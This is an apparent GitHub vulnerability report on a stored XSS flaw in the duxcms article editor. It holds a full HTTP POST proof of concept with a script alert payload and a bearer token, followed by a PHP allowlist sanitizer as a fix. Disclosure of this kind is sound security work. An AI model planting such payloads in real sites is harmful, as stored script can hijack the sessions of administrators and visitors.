duxweb / duxcms

💥 Backend management system developed with PHP and React, based on PHP8 and TypeScript.
https://www.dux.cn
MIT License

There is a storage XSS vulnerability in the creation of articles in duxcms or dux next background. #3

Open czheisenberg opened 5 months ago

czheisenberg commented 5 months ago

Company name: 湖南聚匠信息科技有限公司 Project official website: https://www.dux.cn/. Project address: https://github.com/duxweb/duxcms. Project name: duxcms or dux next. Affected version: v0.3.0-beta

Vulnerability description:

There is a storage XSS vulnerability when creating articles in the background.


Preparatory work:

  1. Log in to the backend.
  2. Content management -> Article categories (create a new category) -> Article list -> Create

Insert the XSS payload:


POC:

POST http://192.168.1.132/admin/content/article HTTP/1.1
Host: 192.168.1.132
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: application/json
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiIsImlhdCI6MTcxODE3MzI1MCwiZXhwIjoxNzE4MjU5NjUwLCJpZCI6MX0.lGzXsCh5Id5aerGPKCEX5UYAipMn8wdu6LWr3BnJJWA
Content-Length: 166
Origin: http://192.168.1.132
Connection: close
Referer: http://192.168.1.132/manage/
Priority: u=1

{"status":true,"images_auto":true,"images":[],"descriptions":"","keywords":[],"content":"<p>&lt;script&gt;alert('xss')&lt;/script&gt;</p>","title":"xss","class_id":1}

Go back to the home page.

The XSS vulnerability will be triggered when you click on the newly created article.


The detail page of the article will also trigger it: http://192.168.1.132/page/article-info/1233. The ID created here is 1233; the actual ID depends on your environment.

Database content:

(screenshot)
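As an added example (not duxcms code), the following PHP shows a server-side allowlist sanitizer that a CMS could apply to the article `content` field before storing or rendering it. It assumes that some layer decodes the entity-encoded body before it reaches the page (the report shows the stored string and the triggered alert but not the decoding step); the sample input is the `content` value from the PoC request above.

```php
<?php
declare(strict_types=1);

// Article body exactly as submitted in the PoC request (constructed sample input).
const STORED_CONTENT = "<p>&lt;script&gt;alert('xss')&lt;/script&gt;</p>";

// Elements and attributes an article body legitimately needs (assumed allowlist).
const ALLOWED_TAGS  = ['p', 'br', 'strong', 'em', 'ul', 'ol', 'li', 'h2', 'h3', 'a', 'img'];
const ALLOWED_ATTRS = ['a' => ['href', 'title'], 'img' => ['src', 'alt']];

function sanitizeArticleHtml(string $html): string
{
    $doc = new DOMDocument();
    // Wrap the fragment so the parser treats it as UTF-8 body content.
    $doc->loadHTML('<?xml encoding="UTF-8"><body>' . $html . '</body>', LIBXML_NOERROR | LIBXML_NOWARNING);
    $body = $doc->getElementsByTagName('body')->item(0);
    cleanNode($body);
    $out = '';
    foreach ($body->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

function cleanNode(DOMNode $node): void
{
    // Iterate over a snapshot because the child list is mutated below.
    foreach (iterator_to_array($node->childNodes, false) as $child) {
        if ($child instanceof DOMElement) {
            $tag = strtolower($child->tagName);
            if (!in_array($tag, ALLOWED_TAGS, true)) {
                $node->removeChild($child);   // script, style, iframe, ...: drop element and content
                continue;
            }
            foreach (iterator_to_array($child->attributes, false) as $attr) {
                $name = strtolower($attr->name);
                $ok = in_array($name, ALLOWED_ATTRS[$tag] ?? [], true)
                    && !preg_match('/^\s*(javascript|data|vbscript):/i', $attr->value);
                if (!$ok) {
                    $child->removeAttribute($attr->name);   // on* handlers, javascript: URLs, unknown attrs
                }
            }
            cleanNode($child);
        } elseif (!($child instanceof DOMText)) {
            $node->removeChild($child);   // comments, CDATA, processing instructions
        }
    }
}

// Sanitize the decoded form, so the script element never reaches the page even if entities are decoded later.
$decoded = html_entity_decode(STORED_CONTENT, ENT_QUOTES | ENT_HTML5, 'UTF-8');
echo sanitizeArticleHtml($decoded), PHP_EOL;
```

Applying the sanitizer on write keeps the payload out of the database; applying it again on render protects content that was stored before the fix.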